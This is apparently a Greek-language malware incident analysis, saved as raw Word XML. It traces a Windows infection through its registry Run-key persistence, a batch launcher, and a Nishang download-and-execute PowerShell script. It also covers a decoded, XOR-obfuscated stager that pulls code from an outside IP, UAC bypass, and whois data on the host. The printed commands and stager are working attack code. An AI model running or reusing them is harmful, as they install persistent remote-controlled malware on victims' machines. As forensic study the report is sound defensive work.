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contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.doy45ug5ijiz" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ΕΠΕΙΣΟΔΙΟ #2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Με την είσοδο στο πρόγραμμα φαίνεται καθαρά ότι ξεκινάει κάποιο ύποπτο process διότι ανοίγει παράθυρο command, και εκτελείτε ύποπτο πρόγραμμα powershell…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276850" cy="3228975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Επόμενη λογική κίνηση (εκτός των άλλων) είναι να ανοίξουμε autorun για να δούμε  τι εκτελείτε στο logon.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133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Παραπάνω βλέπουμε ύποπτο εκτελέσιμο πρόγραμμα (batch) με το όνομα </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\users\public\start.bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> να εκτελείτε κατά εκκίνηση.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Πιο συγκεκριμένα το πρόγραμμα αυτό βρίσκεται στο Registry, στην παρακάτω θέση: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9144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Στο κατάλογο c:\users\public παρατηρούμε 2 ύποπτα αρχεία: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priv_add_pers.ps1 (αρχείο με κώδικα PowerShell)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start.bat (το «πονηρό» εκτελέσιμο που καλείτε κατά την εκκίνηση)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contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.g32pwfwimiks" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ΑΝΑΛΥΣΗ ΤΟΥ MALWARE - PHASE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Κατά την ανάλυση του start.bat βλέπουμε αυτό που περιμέναμε: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@echo off &amp; cd c:\users\public &amp; powershell.exe -windowstyle hidden -executionPolicy Bypass .\priv_add_pers.ps1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Eκτελείτε (με @echo off ώστε να μην εμφανίσει κάτι στην κονσόλα) απλά καλεί σε ένα κρυφό παράθυρο το </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">priv_add_pers.ps1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">μέσω powershell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Σημαντικό σημείο η flag “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-executionPolicy Bypass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” η οποία κάνει κάποιο powershell script να εκτελείτε από οποιοδήποτε file και σύμφωνα με την Microsoft </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:shd w:fill="e9e9e9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Nothing is blocked and there are no warnings or prompts"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  !!!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Διαβάζοντας το </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">priv_add_pers.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> βλέπουμε ότι τηρεί όσα… υπόσχονται τα σχόλια του!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Download-Execute-PS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&lt;#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.SYNOPSIS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Nishang Payload which downloads and executes a powershell script.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.DESCRIPTION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This payload downloads a powershell script from specified URL and then executes it on the target.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Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename.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.PARAMETER ScriptURL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The URL from where the powershell script would be downloaded.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.PARAMETER Arguments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The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.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This is to be used when the scripts load a function in memory, true for most scripts in Nishang.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.PARAMETER Nodownload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If this switch is used, the script is not dowloaded to the disk.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.EXAMPLE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PS &gt; Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x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.EXAMPLE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PS &gt; Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload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The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1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.LINK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http://labofapenetrationtester.com/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https://github.com/samratashok/nishang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#&gt;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[CmdletBinding()] Param(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[Parameter(Position = 0, Mandatory = $True)]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[String]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$ScriptURL,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[Parameter(Position = 1, Mandatory = $False)]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[String]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$Arguments,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[Switch]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$nodownload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($nodownload -eq $true)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Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))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if($Arguments)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Invoke-Expression $Arguments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$rand = Get-Random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$webclient = New-Object System.Net.WebClient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$file1 = "$env:temp\$rand.ps1"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$webclient.DownloadFile($ScriptURL,"$file1")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$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1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Invoke-Expression $pastevalue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Download-Execute-PS http://83.212.111.137/down/powerup.ps1 -Argument evilscript -nodownload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Η ουσία βρίσκεται στην τελευταία γραμμή του script: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Download-Execute-PS http://83.212.111.137/down/powerup.ps1 -Argument evilscript -nodownload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Καλείτε και εκτελείτε από τον server με IP 83.212.111.137 λογισμικό κατά πάσα πιθανότητα κακόβουλο.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Ο συγκεκριμένος server δείχνει live με Apache2 και Λειτουργικό Ubuntu, ως εξής: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Παρατίθεται WHOIs information του Server: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486400" cy="1571625"/>
            <wp:effectExtent b="0" l="0" r="0" t="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160" w:before="320" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.w70n0a4gae1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color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:fill="fcfdfd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whois information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% This is the RIPE Database query service.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% The objects are in RPSL format.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%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% The RIPE Database is subject to Terms and Conditions.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% See http://www.ripe.net/db/support/db-terms-conditions.pdf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% Note: this output has been filtered.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% To receive output for a database update, use the "-B" flag.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% Information related to '83.212.96.0 - 83.212.127.255'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% Abuse contact for '83.212.96.0 - 83.212.127.255' is 'abuse@grnet.gr'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inetnum: 83.212.96.0 - 83.212.127.255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netname: OKEANOS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descr: Greek Research and Technology Network S.A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descr: 56 Messogion Av.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descr: 11527 Athens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country: GR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admin-c: GN1931-RIPE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tech-c: GN1931-RIPE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status: ASSIGNED PA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mnt-by: GRNET-NOC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remarks: INFRA-AW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mnt-domains: MNT-GRNET-DNS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created: 2013-04-03T11:50:21Z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last-modified: 2013-04-03T11:50:21Z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source: RIPE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role: GRNET NOC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org: ORG-GRaT1-RIPE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address: Greek Research and Technology Network (GRNET) S.A.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address: Messogeion 56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address: Athens 11527, GREECE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phone: +30 210 7474274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fax-no: +30 210 7474490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remarks: --------------------------------------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remarks: For complains about abuse, spam etc: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abuse-mailbox: abuse@grnet.gr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remarks: --------------------------------------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admin-c: PT1566-RIPE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tech-c: YM412-RIPE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tech-c: AP3196-RIPE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tech-c: AL3706-RIPE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mnt-by: GRNET-NOC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nic-hdl: GN1931-RIPE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created: 2007-06-12T14:21:14Z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last-modified: 2014-01-27T08:08:29Z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source: RIPE # Filtered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% Information related to '83.212.96.0/19AS5408'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route: 83.212.96.0/19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descr: OKEANOS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origin: AS5408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mnt-by: GRNET-NOC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created: 2013-04-03T11:52:34Z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last-modified: 2013-04-03T11:52:34Z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source: RIPE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% This query was served by the RIPE Database Query Service version 1.85.1 (DB-2)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160" w:before="320" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.srs6f4xa3h86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color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:fill="fcfdfd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parent whois information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% This is the RIPE Database query service.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% The objects are in RPSL format.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%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% The RIPE Database is subject to Terms and Conditions.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% See http://www.ripe.net/db/support/db-terms-conditions.pdf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% Note: this output has been filtered.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% To receive output for a database update, use the "-B" flag.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% Information related to '83.212.0.0 - 83.212.255.255'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% Abuse contact for '83.212.0.0 - 83.212.255.255' is 'abuse@grnet.gr'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inetnum: 83.212.0.0 - 83.212.255.255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descr: Greek Research and Technology Network S.A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org: ORG-GRaT1-RIPE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netname: GR-GRNET-20040317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country: GR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admin-c: GN1931-RIPE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tech-c: GN1931-RIPE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status: ALLOCATED PA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mnt-by: RIPE-NCC-HM-MNT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mnt-lower: GRNET-NOC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mnt-routes: GRNET-NOC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mnt-domains: MNT-GRNET-DNS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created: 2004-03-17T13:24:28Z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last-modified: 2011-08-04T15:58:41Z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source: RIPE # Filtered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organisation: ORG-GRaT1-RIPE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org-name: Greek Research and Technology Network S.A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org-type: LIR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address: 56 Messogion Av.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address: 11527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address: Athens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address: GREECE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phone: +302107474274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fax-no: +302107474490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abuse-mailbox: abuse@grnet.gr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admin-c: PT1566-RIPE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admin-c: GN1931-RIPE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admin-c: AP3196-RIPE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admin-c: AL3706-RIPE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admin-c: YM1289-RIPE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mnt-ref: GRNET-NOC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mnt-ref: RIPE-NCC-HM-MNT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mnt-by: RIPE-NCC-HM-MNT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tech-c: GN1931-RIPE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abuse-c: GN1931-RIPE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created: 2004-04-17T11:24:56Z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last-modified: 2015-03-18T08:28:04Z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source: RIPE # Filtered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role: GRNET NOC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org: ORG-GRaT1-RIPE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address: Greek Research and Technology Network (GRNET) S.A.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address: Messogeion 56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address: Athens 11527, GREECE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phone: +30 210 7474274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fax-no: +30 210 7474490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remarks: --------------------------------------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remarks: For complains about abuse, spam etc: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abuse-mailbox: abuse@grnet.gr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remarks: --------------------------------------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admin-c: PT1566-RIPE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tech-c: YM412-RIPE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tech-c: AP3196-RIPE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tech-c: AL3706-RIPE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mnt-by: GRNET-NOC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nic-hdl: GN1931-RIPE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created: 2007-06-12T14:21:14Z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last-modified: 2014-01-27T08:08:29Z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source: RIPE # Filtered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% Information related to '83.212.243.0/24AS5408'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route: 83.212.243.0/24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descr: HCMR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origin: AS5408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mnt-by: GRNET-NOC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created: 2008-09-18T14:26:04Z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last-modified: 2008-09-18T14:26:04Z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source: RIPE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% This query was served by the RIPE Database Query Service version 1.86 (DB-2)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160" w:before="320" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.n47t90sos4ir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color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:fill="fcfdfd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geo information</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:bidi w:val="0"/>
        <w:tblW w:w="8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90"/>
        <w:gridCol w:w="4560"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3690"/>
            <w:gridCol w:w="4560"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Athens, Attica, Greece (GR) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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Latitude and Longitude</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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37.98, 23.73</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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810000" cy="2857500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2" name="image09.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image0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85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after="160" w:before="320" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.wn65xj6xfhbp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color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:fill="fcfdfd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="350.18181818181824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sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:fill="fcfdfd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The information on this page is collected from many different sources on the internet. Below is the last update date given from each source.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:bidi w:val="0"/>
        <w:tblW w:w="8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3810"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4440"/>
            <w:gridCol w:w="3810"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AS number information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2016-05-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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Parent whois information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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2016-04-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Port scan data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cached, max 2 weeks old</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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PTR record and DNS servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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Cached, max 1 week old</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SPAM and blocklist databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd" w:space="0" w:sz="8" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f9f9f9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20" w:lineRule="auto"/>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:shd w:fill="f9f9f9" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2016-05-27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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Whois information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="dddddd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2016-03-11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contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.sbxia0vciep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contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.xnwtd3jeao78" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ΑΝΑΛΥΣΗ ΤΟΥ powerup.ps1 - PHASE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script εμφανίζεται ως malware στο VistusTotal με χαμηλό όμως ratio: 2/56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908300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20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Στα 2 που το εντόπισαν, αναφέρεται ως </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor Shaninging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware.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Το exploit που αναλύουμε βασίζεται στο γνωστό exploit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https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> μιας και ο κώδικας είναι ίδιος και χρησιμοποιείται για να κάνει bypass το UAC των windows.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Αμέσως μετά το bypass καλείται το payload, ως powershell script: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Invoke-PsUACme -method oobe -Payload 'powershell.exe -WindowStyle Hidden –enc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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">='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Αφού αποκρυπτογραφήσουμε το παραπάνω payload (που είναι σε BASE64) παίρνουμε το αντίστοιχο ισοδύναμο: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$WC=NEw-ObjecT SystEm.NeT.WEBCLiENt;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$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';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$Wc.HeAdERS.ADD('User-Agent',$u);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$Wc.PROxy = [SYSteM.Net.WEbRequESt]::DEFaUlTWebProxY;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$wc.PrOxy.CRedENtiALS = [SYstEM.Net.CrEDenTIalCAche]::DeFaultNEtWoRKCrEDentiaLS;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$K='ev\/lXc6kVWZ:[@#NrpH;dw|n0,JBST]';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$I=0;[cHAr[]]$B=([cHAr[]]($wC.DOwnLOADSTring("http://83.212.111.137:8080/index.asp")))|%{$_-BXOR$K[$I++%$K.LenGth]};IEX ($B-joIn'')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οποίο κατεβάζει και 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ο</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> πρόγραμμα από την διεύθυνση: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http://83.212.111.137:8080/index.asp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Πρόκειται για τον ίδιο server που κατέβασε και το προηγούμενο malware (για το index.asp δες επόμενη παράγαφο - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Σημείο 5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contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.yc91ltpq6iej" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IXNH &amp; LOG FILE ACTIVITY - PHASE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Tα 2 malware αρχεία που ξεκινούν με την έναρξη του Λειτουργικού  έχουν ημερομηνία δημιουργίας την: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Πέμπτη 4 Μαίου 5:05:01μμ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5486400" cy="638175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Επίσης στα LOGS φαίνεται ότι την συγκεκριμένη ώρα και πιο συγκεκριμένα </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ένα δευτερόλεπτο πριν </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">έλαβαν χώρα οι παρακάτω κινήσεις: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Information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5/4/2016 5:04:51 AM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PowerShell (PowerShell)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">600</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Provider Lifecycle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Information   5/4/2016 5:04:51 AM  PowerShell (PowerShell)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">600</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Provider Lifecycle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Information   5/4/2016 5:04:51 AM  PowerShell (PowerShell)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">600</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Provider Lifecycle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. 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. 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Σε γενικές γραμμές υπάρχει από την συγκεκριμένη ημέρα έντονη δραστηριότητα μέχρι τις 20:19:29 το απόγευμα και συνεχίζεται και τις υπόλοιπες ημέρες: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8923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Στο όλο το παραπάνω διάστημα έχουν λάβει χώρα οι εξής κινήσεις που φανερώνουν διαδικασία μεταφοράς απο servers στο internet και εκτέλεσης malware στα εξής σημεία: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Σημείο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Αναλυτικά στις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5/4/2016 5:04:51 AM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> κάποιος ή κάτι (με την θέληση του ή εν άγνοια του) εκτέλεσε το παρακάτω powershell command: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5113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ProviderName=Registry NewProviderState=Started SequenceNumber=9 HostName=ConsoleHost HostVersion=4.0 HostId=218fae52-9fcc-4e27-b216-02552b68906e HostApplication=powershell.exe -WindowStyle Hidden -executionPolicy Bypass New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value c:\users\public\start.bat -force ; set-content c:\users\public\start.bat '@echo off &amp; cd c:\users\public &amp; powershell.exe -windowstyle hidden -executionPolicy Bypass .\priv_add_pers.ps1' ; powershell.exe -WindowStyle Hidden -executionPolicy Bypass -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADMALgAyADEAMgAuADEAMQAxAC4AMQAzADcALwBkAG8AdwBuAC8AZQBtAHAAaQByAGUALQBzAGMAcgBpAHAAdAAuAHAAcwAxACcALAAnAGMAOgBcAHUAcwBlAHIAcwBcAHAAdQBiAGwAaQBjAFwAcAByAGkAdgBfAGEAZABkAF8AcABlAHIAcwAuAHAAcwAxACcAKQA= EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Το οποίο εισάγει στο REGISTRY κάτω από το ‘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\Software\Microsoft\Windows\CurrentVersion\Run\</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’  το ‘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c:\users\public\start.bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’ ώστε να καλείτε κάθε φορά που εκκινούμε τον υπολογιστή μας. Επίσης δημιουργεί και τα περιεχόμενα των 2  προγραμμάτων υποστήριξης (αρχεία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start.bat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> και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priv_add_pers.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
